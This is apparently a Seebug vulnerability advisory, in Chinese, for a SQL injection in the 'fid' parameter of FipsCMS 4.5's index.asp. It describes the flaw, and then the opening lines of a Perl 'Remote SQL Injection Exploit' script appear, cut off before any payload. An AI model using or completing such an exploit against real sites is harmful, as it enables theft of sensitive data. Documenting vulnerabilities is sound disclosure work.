FipsCMS Index.ASP SQL注入漏洞

2006-11-2800:00:00

Root

www.seebug.org

JSON

FipsCMS是一款基于ASP的WEB应用程序。

FipsCMS不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞进行sql注入攻击，获得敏感信息。

问题是由于’Index.ASP’脚本对用户提交的’fid’参数缺少过滤，提交恶意sql查询作为参数数据，可更改原来的sql逻辑，获得敏感信息。

fipsASP fipsCMS 4.5
<a href=“http://www” target=“_blank”>http://www</a>,fipsasp.com/


                                                #!/usr/bin/perl
#[Script Name: fipsCMS &lt;= v4.5 (index.asp) Remote SQL Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(

use IO::Socket;
if(@ARGV &lt; 3){
print &q

JSON